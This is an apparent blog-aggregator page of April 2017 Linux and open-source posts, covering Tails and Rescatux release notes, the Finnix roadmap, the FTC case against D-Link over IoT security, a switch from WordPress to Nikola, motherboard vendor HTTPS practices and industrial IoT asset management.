I am always happy to do some skunk work, and if you combine GPUs and Kubernetes, you’ll just be targeting my 2 favorite things in the compute world. Shoot me a message @SaMnCo_23!

19 April, 2017 01:56PM

hackergotchi for Tails


Tails 2.12 is out

This release fixes many security issues and users should upgrade as soon as possible.


New features

  • We installed again GNOME Sound Recorder to provide a very simple application for recording sound in addition to the more complex Audacity. Sound clips recorded using GNOME Sound Recorder are saved to the Recordings folder.

Upgrades and changes

  • We removed I2P, an alternative anonymity network, because we unfortunately have failed to find a developer to maintain I2P in Tails. Maintaining software like I2P well-integrated in Tails takes time and effort and our team is too busy with other priorities.

  • Upgrade Linux to 4.9.13. This should improve the support for newer hardware (graphics, Wi-Fi, etc.).

For more details, read our changelog.

Known issues

See the list of long-standing issues.

Get Tails 2.12

What's coming up?

Tails 3.0 is scheduled for June 13th.

Have a look at our roadmap to see where we are heading to.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

19 April, 2017 10:34AM

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: FTC & D-Link

This is a guest post by Peter Kirwan, technology journalist. If you would like to contribute a post, please contact ubuntu-devices@canonical.com

Anyone who doubts that governments are closing in on hardware vendors in a bid to shut down IoT security vulnerabilities needs to catch up with the Federal Trade Commission’s recent lawsuit against D-Link.

The FTC’s 14-page legal complaint accuses the Taiwan-based company of putting consumers at risk by inadequately securing routers and IP cameras.

In this respect, this FTC lawsuit looks much the same as previous ones that held tech vendors to account for security practices that failed to live up to marketing rhetoric.

The difference this time around is that the FTC’s lawsuit includes a pointed reference to reports that D-Link’s devices were compromised by the same kind of IoT botnets that took down US-based Dyn and European service providers in late 2016.

In one way, this isn’t so surprising. In the wake of these recent attacks, the question of how we secure vast numbers of connected devices has rapidly moved up the agenda. (You can read our white paper on this, here.) In December 2016, for example, after analysing the sources of the Dyn attack, Allison Nixon, director of research at the security firm Flashpoint, pointed to the need for new approaches:

“We must look at this problem with fresh eyes and a sober mind, and ask ourselves what the Internet is going to look like when the professionals muscle out the amateurs and take control of extremely large attack power that already threatens our largest networks.”

In recent years, the way in which the FTC interprets its responsibility to protect US consumers from deceptive practices has evolved. It has already established itself as a guardian of digital privacy. Now, it seems, the FTC may be interested in preventing the disruption that accompanies large-scale DDoS attacks.

D-Link, which describes its security policies as “robust”, has pledged to fight the FTC’s case in court. The company argues that the FTC needs to prove that “actual consumers suffered or are likely to suffer actual substantial injuries”. To fight its cornet, D-Link has hired a public interest law firm which accuses the FTC of “unchecked regulatory overreach”.

By contrast, the FTC believes it simply needs to demonstrate that D-Link has misled customers by claiming that its products are secure, while failing to take “reasonable steps” to secure its devices. The FTC claims that this is “unfair or deceptive” under US law.

But who defines what is “reasonable steps” when it comes to the security of connected devices?

The FTC’s lawsuit argues that D-Link failed to protect against flaws which the Open Web Application Security Project (OWASP) “has ranked among the most critical and widespread application vulnerabilities since at least 2007”.

The FTC might just as easily have pointed to its own guidelines, published over two years ago. In the words of Stephen Cobb, senior security researcher at the security firm ESET: “Companies failing to heed the agency’s IoT guidance. . . should not be surprised if they come under scrutiny. Bear in mind that any consumer or consumer advocacy group can request an FTC investigation.”

The FTC has already established that consumers have a right to expect that vendors will take reasonable steps to ensure that their devices are not used to spy on them or steal their identity.

If the FTC succeeds against D-Link, consumers may also think it reasonable that their devices should be protected against botnets, too.

Of course, any successful action by the FTC will only be relevant to IoT devices sold and installed in the US. But the threat of an FTC investigation certainly will get the attention of hardware vendors who operate internationally and need to convince consumers that they can be trusted on security.

19 April, 2017 09:00AM

April 18, 2017

hackergotchi for Finnix


The future of Finnix

Finnix has a unique place in history. The project was started in 1999, with its first public release in March 2000, making it one of the oldest LiveCDs (predated by DemoLinux and immediately preceded by the Linuxcare Bootable Toolbox). Indeed, Finnix even predated the term “LiveCD”. It’s currently the oldest actively maintained LiveCD distribution.

However, you may notice that the last release was in June 2015, in contrast to the usual release frequency of once or twice per year. I just wanted to let Finnix users know that the project is still expected to be updated, albeit with some changes, hopefully for the better.

EFI support: In contrast to a few years ago, an increasing number of (mostly mass consumer) computers these days are EFI only, and do not have a legacy BIOS bootloader. Finnix currently uses isolinux for the x86 bootloader, which precludes EFI support. I am planning on switching to the GRUB bootloader which will allow for EFI boot support.

AMD64 userland and single kernel: Finnix’s main x86 ISO currently contains a 32-bit userland and two kernels: a 32-bit and a 64-bit kernel. This allows for the most flexibility when working on x86 systems; 32-bit CPUs/userlands are supported, and 64-bit userlands can be chrooted into by booting the 64-bit kernel, even though the CD userland is 32-bit.

However, modern kernels are very large; and two built-in kernels take up a good majority of the space on a Finnix CD. AMD64 CPUs have been in consumer usage for 13 years now, and for most tasks, a single AMD64 kernel and 64-bit userland will be sufficient. For working with AMD64 systems with 32-bit userlands (which are still a common minority), this will still be supported.

Of course, this means future main Finnix releases will not support CPUs released before 2004 (and even some 32-bit CPUs released after that), but for such “classic” systems, older Finnix releases will still be usable for most tasks. In addition, Project NEALE will still be capable of building Finnix CDs with a 32-bit kernel and userland. And indeed, NEALE is already capable of building pure-AMD64 ISOs and has been for years, so this is not much of a change from a development perspective.

Upstream Debian kernels: Since 2005, Finnix has used kernels based on Debian, but modified out of necessity. This was usually to add support for code needed for an efficient LiveCD experience which had not been upstreamed (cloop, then SquashFS; UnionFS, then AUFS, then OverlayFS). As of Finnix 111, the main requirements are SquashFS and OverlayFS, both of which are now upstreamed into the vanilla kernel, so there is no technical need for patched kernels.

Finnix still used modified kernels, mostly to remove modules which are not needed on a text-mode LiveCD (such as sound and video modules) to save space. However, creating and packaging modified kernels is a time and labor intensive process, and with the space saved by only shipping one kernel on the CD, removing modules to save space is no longer a great concern. As such, future Finnix releases will use unmodified Debian-based kernels.

(Sadly, this also means the end of the custom Finnix kernel CPU logos displayed on initial boot.)

systemd init: Finnix currently uses runit as a system init, which was small and let me sidestep sysvinit and Debian’s distro rc assumptions. (Prior to runit, Finnix build procedures involved cutting out most of the sysvinit rc functionality and putting Finnix replacements in.) But it’s very much a manual process, and as all distros are or are in the process of transitioning to systemd, now would be a good time to do the same.

systemd is large and has a reputation of wanting to consume everything, but as I’ve found out with a few days of research and testing, it’s actually rather conducive to distribution management. For example, one thing Finnix needs to be able to do is attempt DHCP on all network interfaces, but not block on it (getting to the command prompt quickly is the most important consideration). I was able to quickly write a service which depended on systemd-udev-settle.service, ensuring all boot interfaces were available, write interfaces.d definitions and trigger starts of ifup@$INT.service without blocking on the getty process. It even has the ability to pivot-root back to an initramfs at the end of system shutdown, something I needed to patch manually into runit.

Size bloat: Finnix’s main stated goal is to be a small – but useful – utility LiveCD. To keep the size down and remain a quick option for download, maximum size goals are attempted. This was originally 100MB, and then for years the stated target was under 185MB – the size of a Mini CD. (This was mostly an arbitrary designation as Mini CDs were never widely popular.)

Finnix releases have always been small, but have included a lot of semi-hand optimization to keep the size down. For example, the mastering process has a trick which is to decompress all .gz files, then to “recompress” them as gzip level 0 (which essentially adds a small header to the uncompressed file). This sounds counterintuitive, but allows the XZ-compressed root filesystem to more efficiently compress that data later on.

In the interest of ease of maintenance and natural upstream size bloat, the new target is to keep Finnix releases under 300MB. This is unlikely to be approached any time soon – Finnix 111’s x86 CD is 160MB, and the removal of a second kernel as mentioned above will allow for size concessions in other places – but it’s a good goal to allow for future expansions.

PowerPC discontinuation: Years ago, I attempted to discontinue Finnix for the PowerPC, but quickly learned there were a number of PowerPC fans who relied on Finnix. I re-introduced the architecture, but with a caveat that it would not be a release blocker (i.e. if a large bug were discovered which affected PowerPC close to release, that particular release would not get PowerPC support). That ended up never happening, but it was still policy.

However, things in the last year have complicated development. Mainly, Debian has announced it is dropping PowerPC from its next release, and has already removed binary-powerpc from its testing line (which Finnix uses as a base). NEALE builds still work against Debian unstable (neale-ppc-unstable-standard, neale-ppc-unstable-minimal, though even unstable’s PowerPC future is uncertain.

Finnix for PowerPC will continue to be buildable via NEALE using unstable as long as this is possible, and again, older Finnix releases will still be usable if you need to work on a PowerPC system.

Once a new Finnix release is made, I plan on rearranging the front page to highlight the latest working release for any particular architecture.

Mirror updates: The Finnix mirror network currently mirrors all Finnix releases, going back to version 0.03 back in 2000, and the total mirror size is about 8GB. I plan on splitting this up into two sets of mirrors, one which contains all historical releases, and one which contains the last 2 releases, plus the last usable release for discontinued architectures as mentioned above. Mirror administrators can then choose if they want to mirror everything, or just the most downloaded releases.

I’ve fixed all of the problems which have been preventing NEALE builds from completing in the last 9 months, and will be starting main development on this new iteration of Finnix, hopefully with a release later in the year.

18 April, 2017 09:47PM

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Unitas Global and Canonical provide Fully-Managed Enterprise OpenStack

Unitas Global, the leading enterprise hybrid cloud solution provider, and Canonical, the company behind Ubuntu, the leading operating system for container, cloud, scale out, and hyperscale computing announced they will provide a new fully managed and hosted OpenStack private cloud to enterprise clients around the world.

This partnership, developed in response to growing enterprise demand to consume open source infrastructure, OpenStack and Kubernetes, without the need to build in-house development or operations capabilities, will enable enterprise organizations to focus on strategic Digital Transformation initiatives rather than day to day infrastructure management.

This partnership along with Unitas Global’s large ecosystem of system integrators and partners will enable customers to choose an end to end infrastructure solution to design, build, and integrate custom private cloud infrastructure based on OpenStack. It can then be delivered as a fully-managed solution anywhere in the world allowing organisations to easily consume the private cloud resources they need without building and operating the cloud itself.

Private cloud solutions provide predictable performance, security, and the ability to customize the underlying infrastructure. This new joint offering combines Canonical’s powerful automated deployment software and infrastructure operations with Unitas Global’s infrastructure and guest level managed services in data centers globally.

“Canonical and Unitas Global combine automated, customizable OpenStack software alongside fully-managed private cloud infrastructure providing enterprise clients with a simplified approach to cloud integration throughout their business environment,” explains Grant Kirkwood, CTO and Founder, Unitas Global. “We are very excited to partner with Canonical to bring this much-needed solution to market, enabling enhanced growth and success for our clients around the world.”

“By partnering with Unitas Global, we are able to deliver a flexible and affordable solution for enterprise cloud integration utilizing cutting-edge software built on fully-managed infrastructure,” said Arturo Suarez, BootStack Product Manager, Canonical. “At Canonical, it is our mission to drive technological innovation throughout the enterprise marketplace by making flexible, open source software available for simplified consumption wherever needed, and we are looking forward to working side-by-side with Unitas Global to deliver upon this promise.”

To learn more about Unitas Global, visit.

For more information about Canonical BootStack, visit.

18 April, 2017 12:30PM

Alan Pope: Switching from WordPress to Nikola

Goodbye WordPress!

For a long while my personal blog has been running WordPress. Every so often I've looked at other options but never really been motivated to change it, because everything worked, and it was not too much effort to manage.

Then I got 'hacked'. :(

I host my blog on a Bitfolk VPS. I had no idea my server had been compromised until I got a notification on Boxing Day from the lovely Bitfolk people. They informed me that there was a deluge of spam originating from my machine, so it was likely compromised. Their standard procedure is to shutdown the network connection, which they did.

At this point I had access to a console to diagnose and debug what had happened. My VPS had multiple copies of WordPress installed, for various different sites. It looks like I had an old theme or plugin on one of them, which the attackers used to splat their evil doings on my VPS filesystem.

Being the Christmas holidays I didn't really want to spend the family time doing lots of phorensics or system admin. I had full backups of the machine, so I requested that Bitfolk just nuke the machine from orbit and I'd start fresh.

Bitfolk have a really handy self-service provisioning tool for just these eventualities. All I needed to do was ssh to the console provided and follow the instructions on the wiki, after the network connection was re-enabled, of course.

However, during the use of the self-serve installer we unconvered a bug and a billing inconsistency. Andy at Bitfolk spent some time on Boxing Day to fix both the bug and the billing glitch, and by midnight that night I'd had a bank-transfer refund! He also debugged some DNS issues for me too. That's some above-and-beyond level of service right there!

Hello Nikola!

Once I'd got a clean Ubuntu 16.04 install done, I had a not-so-long think about what I wanted to do for hosting my blog going forward. I went for Nikola - a static website generator. I'd been looking at Nikola on and off since talking about it over a beer with Martin in Heidelberg

Beer in Heidelberg

As I'd considered this before, I was already a little prepared. Nikola supports importing data from an existing WordPress install. I'd already exported out my WordPress posts some weeks ago, so importing that dump into Nikola was easy, even though my server was offline.

The things that sold me on Nikola were pretty straightforward.

Being static HTML files on my server, I didn't have to worry about php files being compromised, so I could take off my sysadmin hat for a bit, as I wouldn't have to do WordPress maintenance all the time.

Nikola allows me to edit offline easily too. So I can just open my text editor of choice start bashing away some markdown (other formats are supported). Here you can see what it looks like when I'm writing a blog post in todays favourite editor, Atom. With the markdown preview on the right, I can easily see what my post is going to look like as I type. I imagine I could do this with WordPress too, sure.

Writing this post

Once posts are written I can easily preview the entire site locally before I publish. So I get two opportunities to spot errors, once in Atom while editing and previewing, and again when serving the content locally. It works well for me!

Nikola Workflow

Nikola is configured easily by editing conf.py. In there you'll find documentation in the form many comments to supplement the online Nikola Handbook. I set a few things like the theme, disqus comments account name, and configuration of the Bitfolk VPS remote server where I'm going to host it. With ssh keys all setup, I configured Nikola to deploy using rsync over ssh.

When I want to write a new blog post, here's what I do.

cd popey.com/site
nikola new_post -t "Switching from WordPress to Nikola" -f markdown

I then edit the post at my leisure locally in Atom, and enable preview there with CTRL+SHIFT+M.

Once I'm happy with the post I'll build the site:-

nikola build

I can then start nikola serving the pages up on my laptop with:-

nikola serve

This starts a webserver on port 8000 on my local machine, so I can check the content in various browsers, and on mobile devices should I want to.

Obviously I can loop through those few steps over and again, to get my post right. Finally once I'm ready to publish I just issue:-

nikola deploy

This sends the content to the remote host over rsync/ssh and it's live!


Nikola is great! The documentation is comprehensive, and the maintainers are active. I made a mistake in my config and immediately got a comment from the upstream author to let me know what to do to fix it!

I'm only using the bare bones features of Nikola, but it works perfectly for me. Easy to post & maintain and simple to deploy and debug.

Have you migrated away from WordPress? What did you use? Let me know in the comments below.

18 April, 2017 12:00PM

hackergotchi for rescatux


Rescatux 0.41 beta 1 released

Rescatux 0.41 beta 1 has been released.

Rescatux 0.41 beta 1 new optionsRescatux 0.41 beta 1 new options
Update UEFI order in actionUpdate UEFI order in action


Rescatux 0.41b1 size is about 672 Megabytes.

Some thoughts:

I couldn’t have released an stable Rescatux without UEFI options so I had to add them. So here there are. Please test them and give us feedback either on the mailing list or in the bugs. Depending on how these new options replace Boot Repair functionality I will remove it from Rescatux. Many people, somehow, are using Boot Repair inside Rescatux while we don’t support it and that should be fixed in the next Rescatux stable release.

This new beta release comes with new exciting UEFI options:

  • Update UEFI order
  • Create a new UEFI Boot entry
  • UEFI Partition Status
  • Fake Microsoft Windows UEFI
  • Hide Microsoft Windows UEFI
  • Reinstall Microsoft Windows EFI
  • Check UEFI Boot

You can take a look at the new UEFI options on Rescatux – New UEFI options explained video (The video is a live session, it was not scripted in advance, and that means that it might be longer than needed and maybe boring. You have been warned 😉 . )

The Youtube description has the specific links for each one of the options.

I will explain these in detail here. This will probably go into the features page in the future.

* New option: Update UEFI order option
** Show all available UEFI boot entries and lets you order them

* New option: Create a new UEFI Boot entry.
** Select an EFI file among those present in the ESP partition and add them to the UEFI boot
** Make it the default boot entry

* New option: UEFI Partition Status to know if an ESP partition is a proper ESP partition or not
** Checks if fdisk detects it as an esp partition
** Checks esp flag on the partition
** Checks boot flag on the partition
** Checks if there's a valid filesystem (fat12,fat16 or fat32) on the partition
** Checks if the partition can be mounted
** Checks if the partition' hard disk type is either gpt or msdos

* New option:  Fake Microsoft Windows UEFI boot entry
** Select an EFI file and overwrite the Microsoft EFI files
** Rename it to 'Windows Boot Manager' too.

* New option: Hide Microsoft Windows UEFI boot entry and define default fallback one.
** Select an EFI file and overwrite the default EFI one
** Make sure to delete the default Microsoft Windows ones
** This should be useful for fault UEFIs as the HP EliteBook 8460p or HP EliteBook 8460p laptops

* New option: Reinstall Microsoft Windows EFI
** It copies UEFI files from Windows installation into EFI System Partiton (ESP)
** It adds a new 'Windows Boot Manager' entry and makes it the default one.
** Unfortunately this option is unable to regenerate BCD so it's only useful when you only overwrite or lose the UEFI files

There haven been also many usability improvements to make the life of the final user easier:

* Now EFI System partitions are shown properly in the Rescapp menues
* Now partition types are shown in partition dialogs in the Rescapp menues
* Now partition flags are shown in partition dialogs in the Rescapp menues
* Now partition os-prober long names are shown in partition dialogs in the Rescapp menues
* Show 'Unknown GNU/Linux distro' if we ever fail to parse an /etc/issue file.
* order.py: Usability improvement. When moving entries the last entry moved keeps selected.

* Rescatux width has been increased to 800 pixels.
* Added AFD scanning tecnology adapted for Spanish systems.
* Many grubeasy option improvements (Now handles UEFI too)

Important notice:

  • If you want to use the UEFI options make sure you use DD or another equivalent tool (Rufus in ‘Direct image’ mode, usb imagewriter, etc.) to put Rescatux in your USB
  • If you want to use UEFI options make sure you boot your Rescatux device in UEFI mode
  • If you want to use Rescatux make sure you temporarly disable Secure Boot. Rescatux does not support booting in Secure Boot mode but it should be able to fix most of the UEFI Secure Boot problems if booted in Non Secure Boot mode.

More things I want to do before the stable release are:

Let’s hope it happens sooner than later.

Roadmap for Rescatux 0.40 stable release:

You can check the complete changelog with link to each one of the issues at: Rescatux 0.32-freeze roadmap which I’ll be reusing for Rescatux 0.40 stable release.

  • (Fixed in 0.40b5) [#2192] UEFI boot support
  • (Fixed in 0.40b2) [#1323] GPT support
  • (Fixed in 0.40b11) [#1364] Review Copyright notice
  • (Fixed in: 0.32b2) [#2188] install-mbr : Windows 7 seems not to be fixed with it
  • (Fixed in: 0.32b2) [#2190] debian-live. Include cpu detection and loopback cfg patches
  • (Fixed in: 0.40b8) [#2191] Change Keyboard layout
  • (Fixed in: 0.32b2) [#2193] bootinfoscript: Use it as a package
  • (Fixed in: 0.32b2) [#2199] Btrfs support
  • (Closed in 0.40b1) [#2205] Handle different default sh script
  • (Fixed in 0.40b2) [#2216] Verify separated /usr support
  • (Fixed in: 0.32b2) [#2217] chown root root on sudoers
  • [#2220] Make sure all the source code is available
  • (Fixed in: 0.32b2) [#2221] Detect SAM file algorithm fails with directories which have spaces on them
  • (Fixed in: 0.32b2) [#2227] Use chntpw 1.0-1 from Jessie
  • (Fixed in 0.40b1) [#2231] SElinux support on chroot options
  • (Checked in 0.40b11) [#2233] Disable USB automount
  • (Fixed in 0.40b9) [#2236] chntpw based options need to be rewritten for reusing code
  • [#2239]http://www.supergrubdisk.org/wizard-step-put-rescatux-into-a-media/ suppose that the image is based on Super Grub2 Disk version and not Isolinux.The step about extracting iso inside an iso would not be longer needed. Update doc: Put Rescatux into a media for Isolinux based cd
  • (Fixed in: 0.32b2) [#2259] Update bootinfoscript to the latest GIT version
  • (Fixed in: 0.40b9) [#2264] chntpw – Save prior registry files
  • (Fixed in: 0.40b9) [#2234] New option: Easy Grub fix
  • (Fixed in: 0.40b9) [#2235] New option: Easy Windows Admin

New options (0.41b1):

  • (Added in 0.41b1) Update UEFI order
  • (Added in 0.41b1) Create a new UEFI Boot entry
  • (Added in 0.41b1) UEFI Partition Status
  • (Added in 0.41b1) Fake Microsoft Windows UEFI
  • (Added in 0.41b1) Hide Microsoft Windows UEFI
  • (Added in 0.41b1) Reinstall Microsoft Windows EFI
  • (Added in 0.41b1) Check UEFI Boot

Improved bugs (0.41b1):

  • (Improved in 0.41b1) Now EFI System partitions are shown properly in the Rescapp menues
  • (Improved in 0.41b1) Now partition types are shown in partition dialogs in the Rescapp menues
  • (Improved in 0.41b1) Now partition flags are shown in partition dialogs in the Rescapp menues
  • (Improved in 0.41b1) Now partition os-prober long names are shown in partition dialogs in the Rescapp menues
  • (Improved in 0.41b1) Show ‘Unknown GNU/Linux distro’ if we ever fail to parse an /etc/issue file.
  • (Improved in 0.41b1) Usability improvement. When moving entries the last entry moved keeps selected.

Improved bugs (0.40b11):

  • (Improved in 0.40b11) Many source code build improvements
  • (Improved in 0.40b11) Now most options show their progress while running
  • (Improved in 0.40b11) Added a reference to the source code’s README file in the ‘About Rescapp’ option
  • (Improved in 0.40b11) Not detected’ string was renamed to ‘Windows / Data / Other’ because that’s what it usually happens with Windows OSes

Fixed bugs (0.40b11):

  • (Fixed in 0.40b11) [#1364] Review Copyright notice
  • (Checked in 0.40b11) [#2233] Disable USB automount
  • (Fixed in 0.40b11) Wineasy had its messages fixed (Promote and Unlock were swapped)
  • (Fixed in 0.40b11) Share log function now drops usage of cat to avoid utf8 / ascii problems.
  • (Fixed in 0.40b11) Sanitize ‘Not detected’ and ‘Cannot mount’ messages

Fixed bugs (0.40b9):

  • (Fixed in 0.40b9) [#2236] chntpw based options need to be rewritten for reusing code
  • (Fixed in: 0.40b9) [#2264] chntpw – Save prior registry files
  • (Fixed in: 0.40b9) [#2234] New option: Easy Grub fix
  • (Fixed in: 0.40b9) [#2235] New option: Easy Windows Admin

Fixed bugs (0.40b8):

  • (Fixed in 0.40b8) [#2191] Change Keyboard layout

Improved bugs (0.40b7):

  • (Improved in 0.40b7) [#2192] UEFI boot support (Yes, again)

Improved bugs (0.40b6):

  • (Improved in 0.40b6) [#2192] UEFI boot support

Fixed bugs (0.40b5):

  • (Fixed in 0.40b5) [#2192] UEFI boot support

Fixed bugs (0.40b2):

  • (Fixed in 0.40b2) [#1323] GPT support
  • (Fixed in 0.40b2) [#2216] Verify separated /usr support

Fixed bugs (0.40b1):

  • (Fixed in 0.40b1) [#2231] SElinux support on chroot options

Reopened bugs (0.40b1):

  • (Reopened in 0.40b1) [#2191] Change Keyboard layout

Fixed bugs (0.32b3):

  • (Fixed in 0.32b3) [#2191] Change Keyboard layout

Other fixed bugs (0.32b2):

  • Rescatux logo is not shown at boot
  • Boot entries are named “Live xxxx” instead of “Rescatux xxxx”

Fixed bugs (0.32b1):

  • Networking detection improved (fallback to network-manager-gnome)
  • Bottom bar does not have a shorcut to a file manager as it’s a common practice in modern desktops. Fixed when falling back to LXDE.
  • Double-clicking on directories on desktop opens Iceweasel (Firefox fork) instead of a file manager. Fixed when falling back to LXDE.

Improvements (0.32b1):

  • Super Grub2 Disk is no longer included. That makes easier to put the ISO to USB devices thanks to standard multiboot tools which support Debian Live cds.
  • Rescapp UI has been redesigned
    • Every option is at hand at the first screen.
    • Rescapp options can be scrolled. That makes it easier to add new options without bothering on final design.
    • Run option screen buttons have been rearranged to make it easier to read.
  • RazorQT has been replaced by LXDE which seems more mature. LXQT will have to wait.
  • WICD has been replaced by network-manager-gnome. That makes easier to connect to wired and wireless networks.
  • It is no longer based on Debian Unstable (sid) branch.

Distro facts:

  • Packages versions for this release can be found at Rescatux 0.40b11 packages.
  • It’s based mainly on Debian Jessie (Stable). Some packages are from Debian Unstable (sid). Some packages are from Debian stretch.


Don’t forget that you can use:

Help Rescatux project:

I think we can expect four months maximum till the new stable Rescatux is ready. Helping on these tasks is appreciated:

  • Making a youtube video for the new options.
  • Make sure documentation for the new options is right.
  • Make snapshots for new options documentation so that they don’t lack images.

If you want to help please contact us here:

Thank you and happy download!

Flattr this!

18 April, 2017 07:22AM by adrian15

hackergotchi for Ubuntu developers

Ubuntu developers

Bryan Quigley: Who we trust | Building a computer

I thought I was being smart.  By not buying through AVADirect I wasn’t going to be using an insecure site to purchase my new computer.

For the curious I ended purchasing through eBay (A rating) and Newegg (A rating) a new Ryzen (very nice chip!) based machine that I assembled myself.   Computer is working mostly ok, but has some stability issues.   A Bios update comes out on the MSI website promising some stability fixes so I decide to apply it.

The page that links to the download is HTTPS, but the actual download itself is not.
I flash the BIOS and now appear to have a brick.

As part of troubleshooting I find that the MSI website has bad HTTPS security, the worst page being:

Given the poor security and now wanting a motherboard with a more reliable BIOS  (currently I need to send the board back at my expense for an RMA) I looked at other Micro ATX motherboards starting with a Gigabyte which has even less pages using any HTTPS and the ones that do are even worse:

Unfortunately a survey of motherboard vendors indicates MSI failing with Fs might put them in second place.   Most just have everything in the clear, including passwords.   ASUS clearly leads the pack, but no one protects the actual firmware/drivers you download from them.

Main Website Support Site RMA Process Forum Download Site Actual Download
MSI F F F F F Plain Text
AsRock Plain text Email Email Plain text Plain Text Plain Text
Gigabyte (login site is F) Plain text Plain Text Plain Text Plain text Plain Text Plain Text
EVGA Plain text default/A- Plain text Plain text A Plain Text Plain Text
ASUS A- A- B Plain text default/A A- Plain Text
BIOSTAR Plain text Plain text Plain text n/a? Plain Text Plain Text

A quick glance indicates that vendors that make full systems use more security (ASUS and MSI being examples of system builders).

We rely on the security of these vendors for most self-built PCs.  We should demand HTTPS by default across the board.   It’s 2017 and a BIOS file is 8MB, cost hasn’t been a factor for years.

18 April, 2017 12:50AM

April 17, 2017

Ross Gammon: My March 2017 Activities

March was a busy month, so this monthly report is a little late. I worked two weekends, and I was planning my Easter holiday, so there wasn’t a lot of spare time.


  •  Updated Dominate to the latest version and uploaded to experimental (due to the Debian Stretch release freeze).
  • Uploaded the latest version of abcmidi (also to experimental).
  • Pinged the bugs for reverse dependencies of pygoocanvas and goocanvas with a view to getting them removed from the archive during the Buster cycle.
  • Asked for help on the Ubuntu Studio developers and users mailing lists to test the coming Ubuntu Studio 17.04 release ISO, because I would be away on holiday for most of it.


  • Worked on ubuntustudio-controls, reverting it back to an earlier revision that Len said was working fine. Unfortunately, when I built and installed it from my ppa, it crashed. Eventually found my mistake with the bzr reversion, fixed it and prepared an upload ready for sponsorship. Submitted a Freeze Exception bug in the hope that the Release Team would accept it even though we had missed the Final Beta.
  • Put a new power supply in an old computer that was kaput, and got it working again. Set up Ubuntu Server 16.04 on it so that I could get a bit more experience with running a server. It won’t last very long, because it is a 32 bit machine, and Ubuntu will probably drop support for that architecture eventually. I used two small spare drives to set up RAID 1 & LVM (so that I can add more space to it later). I set up some Samba shares, so that my wife will be able to get at them from her Windows machine. For music streaming, I set up Emby Server. I wold be great to see this packaged for Debian. I uploaded all of my photos and music for Emby to serve around the home (and remotely as well). Set up Obnam to back up the server to an external USB stick (temporarily until I set up something remote). Set LetsEncrypt with the wonderful Certbot program.
  • Did the Release Notes for Ubuntu Studio 17.04 Final Beta. As I was in Brussels for two days, I was not able to do any ISO testing myself.


  • Measured up the new model railway layout and documented it in xtrkcad.
  • Started learning Ansible some more by setting up ssh on all my machines so that I could access them with Ansible and manipulate them using a playbook.
  • Went to the Open Source Days conference just down the road in Copenhagen. Saw some good presentations. Of interest for my previous work in the Debian GIS Team, was a presentation from the Danish Municipalities on how they run projects using Open Source. I noted how their use of Proj 4 and OSGeo. I was also pleased to see a presentation from Ximin Luo on Reproducible Builds, and introduced myself briefly after his talk (during the break).
  • Started looking at creating a Django website to store and publish my One Name Study sources (indexes).  Started by creating a library to list some of my recently read Journals. I will eventually need to import all the others I have listed in a cvs spreadsheet that was originally exported from the commercial (Windows only) Custodian software.

Plan status from last month & update for next month


For the Debian Stretch release:

  • Keep an eye on the Release Critical bugs list, and see if I can help fix any. – In Progress


  • Package all the latest upstream versions of my Debian packages, and upload them to Experimental to keep them out of the way of the Stretch release. – In Progress
  • Begin working again on all the new stuff I want packaged in Debian.


  • Start working on an Ubuntu Studio package tracker website so that we can keep an eye on the status of the packages we are interested in. – Started
  • Start testing & bug triaging Ubuntu Studio packages. – In progress
  • Test Len’s work on ubuntustudio-controls – Done
  • Do the Ubuntu Studio Zesty 17.04 Final Beta release. – Done
  • Sort out the Blueprints for the coming Ubuntu Studio 17.10 release cycle.


  • Give JMRI a good try out and look at what it would take to package it. – In progress
  • Also look at OpenPLC for simulating the relay logic of real railway interlockings (i.e. a little bit of the day job at home involving free software – fun!). – In progress

17 April, 2017 02:35PM

Ubuntu Insights: Industrial IoT – Manage and Control Remote Assets

This is a guest post by Florian Hoenigschmid, Director of azeti. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

When you make a phone call, watch TV or wash your hands, you probably won’t associate this with terms like predictive maintenance, equipment damage, downtime or Service Level Agreements initially.

However, those things are helping to provide services such as mobile connectivity, a stable power grid or clean water. IoT gateways running asset management applications, connected to sensors and machinery are part of a remote asset management system, which monitors and controls critical infrastructure like generators, compressors or HVAC systems in remote locations such as cell towers, water pumping stations or secondary substations. These systems provide operators with insights about the performance of their assets in remote locations. This helps to determine if an asset is about to stop working and therefore require maintenance (preventive maintenance), if equipment has been stolen/destroyed or if operations could be improved and organized in a more cost effective way. The installed remote asset management systems help to minimize downtime, which in turn means a higher quality of the service provided.

Full Stack – Ubuntu and azeti
azeti’s solution is the full stack for managing industrial environments consisting of intelligent software for the edge (azeti Site Controller) running on IoT gateways plus a central server (azeti Engine) application providing visualization, management and deployment capabilities.

Ubuntu Core is the solid fundament for the IoT application and eliminates worries about OS upgrades, security updates and general OS management for thousands of devices. Its broad gateway support helps to choose the right hardware depending on customer’s requirement without a hardware vendor lock-in.

Edge Intelligence for Harsh Environments
azeti’s Site Controller is comparable to a virtual PLC (programmable logic controller) and provides interfaces for all prominent sensor protocols plus sophisticated analytics and automation. This local intelligence enables independence from the network uplink, as even without a cloud connection all local rulesets and automations will function.

If a couple years ago, the paradigm was to centralize, process and analyze everything in the cloud, azeti and Canonical are demonstrating that this paradigm is now shifting towards the edge of the network. As all the data is processed right where it is generated by sensors and machinery, the need for bandwidth and therefore costs is reduced, local execution of action lowers latency and a network with distributed computing also decreases its vulnerability compared to a centralized approach, which may create a single point of failure.

Reference Use Cases
Remote Maintenance Service for Electric Drives – a great example of how IoT can generate new revenue and optimize operations is the project with one of the largest electrical drives vendors where azeti provides the software stack to collect metrics from the drives and visualizes those in beautiful dashboards. Customer can now check health and performance of their drives in a modern web application without connecting directly to the machinery. Remote maintenance is now offered as a new service by the vendor; the increased visibility into assets allow sophisticated preparation before engineers are sent on site, downtimes are decreased and maintenance efforts are reduced. Customers receive better service and increased uptimes of their environments.

